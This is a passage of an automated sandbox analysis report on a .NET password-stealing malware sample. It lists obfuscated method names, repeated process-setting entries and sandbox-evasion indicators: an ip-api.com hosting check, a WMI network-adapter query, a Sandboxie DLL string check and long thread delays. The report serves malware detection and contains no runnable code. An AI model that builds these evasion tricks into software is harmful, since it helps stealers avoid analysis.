                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, lQt3bjCFjySeu10Avr9.csHigh entropy of concatenated method names: 's3N0keKA98', 'cuK0YUkJss', 'Idi06Mx6a8', 'X8s0EUWpn6', 'kaq0UX6ruE', 'Xvb0SDbF4H', 'Kao0IMATGl', 'GgL07isXH7', 'ijF0XZq04X', 'VOc0hbFtUj'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, NOtAo8hDHbV4S980Ea.csHigh entropy of concatenated method names: 'Te5LUf4x1l', 'OpNLIWeVIZ', 'ygF1uQb51L', 'kmO1KC67Yn', 'nI31QOn9Sa', 'r5t12abvYy', 'uv11NuKZDM', 'h601JoAKQ6', 'kJ11ytjYUY', 'eFe1HOqUbP'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, stOlycCWAUXDXt7labi.csHigh entropy of concatenated method names: 'CaFOk07u8V', 'CPROYjspV6', 'f1NO6b5G1I', 'dI4CeTiPvK1pNjrRUot', 'gG5yDkivGVhB2irduij', 'togE97i2npmnDSsmDJX', 'Pl9CQyi8YCVb6LyMjL6'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, x69TvMCoRoUJFd88L0w.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wDcOrJ4PPT', 'cY1Oph0sjt', 'KWUOMChdIl', 'VDtOD6EPgY', 'vifOlooW9P', 'l94ORq6Qhr', 'MNUOcONccG'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, UwQUc8iFGUbE1e0lM9.csHigh entropy of concatenated method names: 'EUuBbqXN2D', 'sfkB832ilw', 'iOoBukinsO', 'aRoBKM3Jfp', 'RWSBrZepnq', 'vMfBQknv44', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, N8PhylRceh4eZBQMYU.csHigh entropy of concatenated method names: 'F905saU2g1', 'DOT5x8DqBp', 'jiyBFmMI5C', 'UxbBC7MW3V', 'u8A5fEFYNT', 'sgF5adnFAE', 'Gfr5eJhqs0', 'SPL5rFnAUZ', 'BVG5pXjZOs', 'Jru5MWkM6r'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, vR30oQGrkAFCk2reXc.csHigh entropy of concatenated method names: 'Dispose', 'w0fCi22h7D', 'F7LW8YvoQh', 'jRixxlrvXR', 'JttCxt68qA', 'yPNCz4nrK3', 'ProcessDialogKey', 'qjlWFwQUc8', 'aGUWCbE1e0', 'UM9WWJKcnQ'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, jjac4rygKOuVBAQDuX.csHigh entropy of concatenated method names: 'EBQvkS8m2d', 'SbFvY9akaQ', 'gJUv6eYmpY', 'Am7vEJWCHK', 'AYJvUwUohj', 'rLHvSFlWyL', 'Pr3vIIY5yU', 'pmpv7r7Sfr', 'HJdvXNo4mT', 'zRGvhshiVk'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, fNgDLlVwKp7yITm1GO.csHigh entropy of concatenated method names: 'hyLCvaBx0C', 'rImC9THXMC', 'BGdCP8ycFK', 'rePCAsyOtA', 'k80CwEau8Y', 'RhKCtl5IMq', 'CN7vSE2lvo2ZMgbxtr', 'QQJx2c8y3NA1UtAXuM', 'JuYCCAYOdm', 'JoNComTPbd'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.csHigh entropy of concatenated method names: 'g0eogQUiDZ', 'dXnoqaOgiA', 'iyPoG6Y7FE', 'mLgo1x8sRa', 'CfPoLevAep', 'LfQomfIxtM', 'WUxovioAJ8', 'udbo9jFTrj', 'q43oZ1OTDs', 'WaNoPasiC2'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, MKcnQUxfK4ESKWpHAj.csHigh entropy of concatenated method names: 'YwV0CknXR0', 'iPg0oXxOi6', 'C710VDRxSj', 'BFO0q6cQqI', 'Hox0GecS43', 'oYX0LDhaLA', 'pVh0me5n4l', 'MDABcKR1tk', 'UPLBsvXKxv', 'vBpBiXb2eq'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, H8YrhKbl5IMqi5bCCw.csHigh entropy of concatenated method names: 'Mm3mgJFrZW', 'q4amG4TKVx', 'ILOmLotj3G', 'rc2mvxTOMj', 'qPLm9eiUQV', 'NmvLlsnDyi', 'xMOLRvJscs', 'zGLLccbo4v', 'KcELsqZfug', 'vLsLiKI6Z6'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, YHmp2TMpnj0Ol4bYvB.csHigh entropy of concatenated method names: 'ToString', 'j6ctfTWgF2', 'PW7t8xEVnp', 'HtutuIC2OC', 'sbXtKPbain', 'MCQtQAgkoR', 'm6pt2NPd9s', 'F4OtNO7YXV', 'w4YtJq9qlp', 'HINty1qRnM'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, RVotStDoL1dYM3wrYJ.csHigh entropy of concatenated method names: 'Ld95Pkf7NB', 'AdS5Aa00mN', 'ToString', 'Rnf5qegSUL', 'sOf5GknjsO', 'R9m51ZAqFb', 'Ex65LjZOFB', 'YZQ5mMgHkm', 'poa5vmE7Xl', 'omi59OfWkT'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, ptt68qsAYPN4nrK35j.csHigh entropy of concatenated method names: 'cdCBqs73CA', 'XAlBG4ZmZj', 'wPxB1eLPGh', 'fxgBLc5DTy', 'MiQBmpHAZR', 'o91Bv4BH6K', 'gEQB9MmOhi', 'A0RBZCcZOd', 'T8qBPi566T', 'lsrBAhZWqb'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, XFYg8MeV9E8pqPhPOM.csHigh entropy of concatenated method names: 'gPIT7me1Jk', 'm8UTXYDjDU', 'A7HTbLi1sY', 'YuCT85furc', 'QbjTKCgX7U', 'gRkTQ0ucu3', 'g4oTNDc8wA', 'JlXTJEDkGQ', 'nIqTHWVdK9', 'gO3TfvjW6R'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, YuYPHUXGd8ycFKBePs.csHigh entropy of concatenated method names: 'vx41ErlVXM', 'Xmn1S4Xahu', 'ctP17HIy8v', 'pQY1XiwN9F', 'aKu1wp6ViF', 'na61t8oN2x', 'muI15VcmD0', 'dAZ1Bcs0og', 'Oj810R67Pd', 'YVu1OD1DU8'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, evO3OhNqvdpcTnHPi9.csHigh entropy of concatenated method names: 'AWJvqtPNoi', 'Hvvv1VFIRK', 'mGKvmeXgej', 'lHWmx6kuJa', 'Pw1mz0Blw6', 'jt3vFtBVFI', 'YWFvCZeRdn', 'sbSvWPnTDn', 'LVMvohoPjw', 'kkcvVpAGgX'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, cWqDldrDf5gHB0qqkS.csHigh entropy of concatenated method names: 'MATwHGEqLR', 'vuSwabWukp', 'z0GwrAhZOt', 'Gw6wp9HZO6', 'B0Gw8rZvOO', 'YAfwu27V9e', 'KLUwKekmEd', 'ATWwQiPC7D', 'NCyw2xR54p', 'XUtwNZbGT2'
                        Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, iaBx0C70ImTHXMC3jW.csHigh entropy of concatenated method names: 'mhYGrLoUHI', 'nJ4GprFoOW', 'G3bGMgGEwA', 'EIiGD0G5rZ', 'JqVGlZtR3N', 'U9PGR1Ql1r', 'eekGciIDak', 'JI7GsplTkK', 'DpNGirg7Wo', 'YuYGxu1kPh'
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256, type: MEMORYSTR
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: 17D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: 7DA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: 79A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: 8DA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: 9DA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: A380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: B380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeMemory allocated: C380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599226Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597777Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597671Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596906Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596796Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596250Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595375Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
